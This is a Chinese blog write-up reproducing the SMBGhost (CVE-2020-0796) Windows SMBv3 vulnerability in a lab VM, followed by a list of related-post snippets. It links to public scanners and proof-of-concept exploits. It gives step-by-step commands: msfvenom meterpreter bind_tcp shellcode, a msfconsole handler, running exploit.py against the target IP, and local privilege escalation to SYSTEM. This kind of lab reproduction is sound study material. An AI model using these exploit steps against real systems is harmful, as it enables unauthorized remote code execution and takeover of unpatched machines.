网上现在已经有很多复现的文章了,我也做一个学习总结。

0x00 漏洞描述

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

0x01 影响范围

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows Server, Version 1903 (Server Core installation)
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows Server, Version 1909 (Server Core installation)

0x02 准备工作

Win10 1903的镜像:cn_windows_10_consumer_editions_version_1903_updated_sept_2019_x64_dvd_ef681fec.iso_免费高速下载|百度网盘-分享无限制

漏洞检测工具: https://github.com/ollypwn/SMBGhost

奇安信检测工具: http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

蓝屏POC: https://github.com/eerykitty/CVE-2020-0796-PoC

本地提权POC:https://github.com/danigargu/CVE-2020-0796/releases/download/v1.0/cve-2020-0796-local_static.zip

远程漏洞利用POC:https://github.com/chompie1337/SMBGhost_RCE_PoC

0x03 漏洞复现

首先注意不是任意Win10都存在该漏洞,注意对应版本,Vmware安装完镜像后,需要关闭防火墙,不然主机的流量无法过去。选择“打开网络和Internet设置”

点击“Windows防火墙”,将以下三个网络全部关闭,之后进行漏洞检测和利用。

Win10虚拟机IP此时为192.168.194.137

1)漏洞检测的两个工具,第一个利用方式

第二个奇安信的工具的利用方式,可进行批量检测

2)蓝屏POC脚本执行前需安装需要的库pip install ntlm_auth,python3环境下运行,运行后虚拟机立马就蓝屏重启了。

3)本地提权POC,需要将exe文件上传到目标机器,但不具备免杀效果,所以需要关闭杀毒。

在目标机器上运行exe文件会弹出一个system权限的shell对话框,成功提权。

4)远程漏洞利用POC

1-首先使用Kali的msfvenom生成一个python类型正向连接的shellcode。

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

2-将生成的 shellcode 替换 POC 中 exploit.py 里的USER_PAYLOAD字段,注意要将buf替换为USER_PAYLOAD,同时注意msfvenom生成的shellcode比exploit.py里原有多几行,需自行添加补齐。

3-msfconsole开启监听端口

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
options
set rhost 192.168.194.137
run​

4-运行exploit.py 执行命令: python exploit.py -ip 192.168.194.137

过程中需要多执行几次,经常会出现“[-] physical read primitive failed!”的语句就终止了。

5-当成功运行起来后,出现到“[+] Press a key to execute shellcode!”执行shellcode按下“Enter”时,会大概率把Win10打蓝屏重启,其中一次没有重启,但Kali中的监听端口却没有收到Shell,按下【Ctrl】+【C】,再重新执行run命令,就会收到meterpreter的Shell了。

6-拿到Shell后可结合本地提权的POC,在关掉杀毒,防火墙的情况下运行进行提权。

CVE-2020-0796漏洞复现相关推荐

  1. CVE(2017-15715、2021-41773、2021-40438)漏洞复现

    仅用于学习参考,不要贪玩哦(*^▽^*) 目录 CVE-2017-15715 漏洞介绍 漏洞复现 CVE-2021-41773 漏洞介绍 漏洞复现 CVE-2021-40438 漏洞介绍 漏洞复现 一 ...

  2. android 动画 最顶层_【Android编程实战】StrandHogg漏洞复现及原理分析_Android系统上的维京海盗...

    0x00 StrandHogg漏洞详情 StrandHogg漏洞 CVE编号:暂无 [漏洞危害] 近日,Android平台上发现了一个高危漏洞 该漏洞允许攻击者冒充任意合法应用,诱导受害者授予恶意应用 ...

  3. php打开网页执行即执行bat程序_CVE202011107:XAMPP任意命令执行漏洞复现

    0x00简介 XAMPP是一个把Apache网页服务器与PHP.Perl及MariaDB集合在一起的安裝包,允许用戶可以在自己的电脑上轻易的建立网页服务器.该软件与phpstudy类似. 2020年4 ...

  4. MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现

    MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现 文章目录 MS08-067远程代码执行漏洞(CVE-2008-4250 ...

  5. CVE-2019-1388 Windows UAC 漏洞复现

    CVE-2019-1388 Windows UAC 漏洞复现 文章目录 CVE-2019-1388 Windows UAC 漏洞复现 1. 概述 1.1 UAC 1.2 漏洞简述 1.3 风险等级 1 ...

  6. Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328

    Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...

  7. java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...

    学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...

  8. 查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)

    OpenSSH命令注入漏洞复现(CVE-2020-15778) 目录 漏洞描述 漏洞等级 漏洞影响版本 漏洞复现 修复建议 ▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现.通 ...

  9. cve-2020-0796_CVE20200796 | Windows SMBv3客户端/永痕之黑漏洞复现

    0x01 漏洞介绍 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,Microsoft Guidance for Disabling SMBv3 ...

  10. openssh漏洞_技术干货 | OpenSSH命令注入漏洞复现(CVE202015778)

    本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作! 欢迎各位添加 ...

最新文章

  1. odbc 函数序列错误_python时间序列:移动窗口函数前篇
  2. Java程序设计进阶之路一:捕捉异常
  3. delphi 打包工具_每年帮你省钱20万的砖头打包方式,是你想要的吗?
  4. Android实现文件下载并自动安装apk包
  5. 带你学python基础:面向对象编程
  6. mysql 编码和汉字存储占用字节问题的探索
  7. hadoop环境搭建遇到的问题:-bash: jps: command not found
  8. samba配置不同用户不同权限_前端问题集:vue配置环境-给不同的环境配不同的打包命令...
  9. Java学习笔记——JDBC读取properties属性文件
  10. 职称计算机怎么练,2017职称计算机windows操作训练题
  11. 北京上海等昨天大规模断网 专家称与太阳无关
  12. 自定义ContentProvider
  13. mysql的数据备份及恢复
  14. hadoop面试题汇总
  15. 苹果ipad邮箱找不到服务器,ipad怎么设置qq邮箱?苹果ipad qq邮箱设置教程
  16. 木子-数据库-sqlServer数据库安装方式
  17. Python自动化整理文件“大升级”,任意路径下文件,都给你整理的明明白白!...
  18. Python数据分析到底可以用来做什么?
  19. Web3+品牌的大杀器:DAO如何实现对传统品牌彻底的降维打击
  20. 追女孩的九大禁忌!!!

热门文章

  1. gitlab启动访问502,Whoops, GitLab is taking too much time to respond。
  2. 动态规划思想以及常见应用
  3. 通过深度优先算法来找出有向图的树边,后向边,前向边,横跨边
  4. 令人头疼的编程命名问题你如何面对?
  5. 刚刚,常温常压超导首被证明理论可行:美顶尖实验室论文出炉
  6. 从 Gson 中的序列化中排除字段
  7. JQuery $.ajax 如何捕获异常信息?
  8. Folx Pro 5 最好用的Mac磁力链接BT种子下载工具
  9. 五一玩转辽宁之二 本溪野炊自助行
  10. Hive常见的压缩格式